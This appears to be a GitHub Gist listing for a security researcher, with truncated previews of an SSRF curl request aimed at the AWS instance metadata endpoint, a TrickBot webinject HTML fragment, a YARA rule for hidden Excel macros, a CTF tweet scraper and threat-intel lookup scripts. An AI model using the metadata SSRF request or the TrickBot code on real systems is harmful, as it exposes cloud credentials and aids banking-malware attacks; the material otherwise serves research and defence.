curl "http://tdir-webappalb-eza1ljisfr1s-421257952.us-east-1.elb.amazonaws.com/demo.php?site=http://169.254.169.254/latest/meta-data/"
SELECT job.job_id as [JOB_ID],
job.name as [JOB_NAME],
job.description as [JOB_DESCRIPTION],
steps.step_name,
steps.subsystem,
steps.command,
SUSER_SNAME(job.owner_sid) as [JOB_OWNER],
steps.proxy_id,
proxies.name as [proxy_account],
job.enabled,
rule Excel_Hidden_Macro_Sheet
{
meta:
Author = "InQuest Labs"
URL = "https://github.com/InQuest/yara-rules"
Description = "http://blog.inquest.net/blog/2019/01/29/Carving-Sneaky-XLM-Files/"
strings:
$ole_marker = {D0 CF 11 E0 A1 B1 1A E1}
$macro_sheet_h1 = {85 00 ?? ?? ?? ?? ?? ?? 01 01}
$macro_sheet_h2 = {85 00 ?? ?? ?? ?? ?? ?? 02 01}
@sneakymonk3y
sneakymonk3y / marker_.html
Created May 21, 2019 19:31
TRICKBOT injectdll64 HTML
<!DOCTYPE html>
<html>
<head>
<script type="text/javascript">
function ahead()
{
objs = new Array([navigator, "navigator"], [screen, "screen"]);
str = new String("");
for(i = 0; i<objs.length; i++) {
for(var prop in objs[i][0]) {
@sneakymonk3y
sneakymonk3y / tweetgrab.py
Created March 18, 2019 19:02
HTB CTF - grab tweets based on Twitter handle specified and dump to .csv
#!/usr/bin/env python
# encoding: utf-8
import tweepy #https://github.com/tweepy/tweepy
import csv
#Twitter API credentials
consumer_key = ""
consumer_secret = ""
access_key = ""
@sneakymonk3y
sneakymonk3y / iplookup.sh
Last active November 13, 2023 12:23
IP lookup / greynoise.io / ipinfo.io / shodan.io / otx.alienvault.com
#!/bin/bash
args=("$@")
check_greynoise()
{
echo "GREYNOISE"
curl -s -XPOST -d 'ip='${args[0]} 'http://api.greynoise.io:8888/v1/query/ip' | jq '.'
}
@sneakymonk3y
sneakymonk3y / malware-lab-tools.txt
Last active March 19, 2020 07:42
Malware Lab Tools
BinText / strings / strings2 / bstrings
Process Monitor
Process Hacker
Autoruns
PEiD
Regshot
LordPE
Ollydbg
IDA Pro/FREE
WireShark
@sneakymonk3y
sneakymonk3y / README.md
Created August 20, 2017 16:20 — forked from hofmannsven/README.md
My simply MySQL Command Line Cheatsheet

Keybase proof

I hereby claim:

  • I am sneakymonk3y on github.
  • I am markrobinsonuk (https://keybase.io/markrobinsonuk) on keybase.
  • I have a public key whose fingerprint is ECA3 444F 6B24 2086 DF9B 3031 2599 7F90 2D61 F421

To claim this, I am signing this object: